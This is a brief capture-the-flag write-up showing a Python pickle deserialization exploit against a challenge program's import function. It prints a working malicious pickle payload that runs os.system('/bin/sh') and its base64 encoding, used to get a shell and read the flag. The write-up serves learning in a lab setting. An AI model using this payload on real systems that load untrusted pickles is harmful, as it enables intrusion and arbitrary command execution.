![c137eac00d2400170113147f39020439.png](09e8c92baec849e6bc1d374cbcce8e39.png)
![b13965659266c0000667abac7fd4b2f6.png](25edeac7ae614c838e7efaa9f312a3e5.png)
The interesting function is `import`
Breaking the `import` function gives us an error
![059c87ed0ef3beee17af98c35484bd86.png](d6eae773fd604cfaa6c2a9f9a230fa11.png)
So it wants a **base64** encoded pickle object and we need to read the flag. Let's get a shell using a malicious pickle object.
reading: https://checkoway.net/musings/pickle/
```
cos
system
(S'/bin/sh'
tR.
```
base64 encoding that gives us
`Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4=`
and passing that to the program...
![a38a9edbb6e81a02fa0cc4e00f256497.png](171fb505de1b4d20831160e69e136111.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #python #pickle #deserialization #pwn
Related: [[Peak Hill]]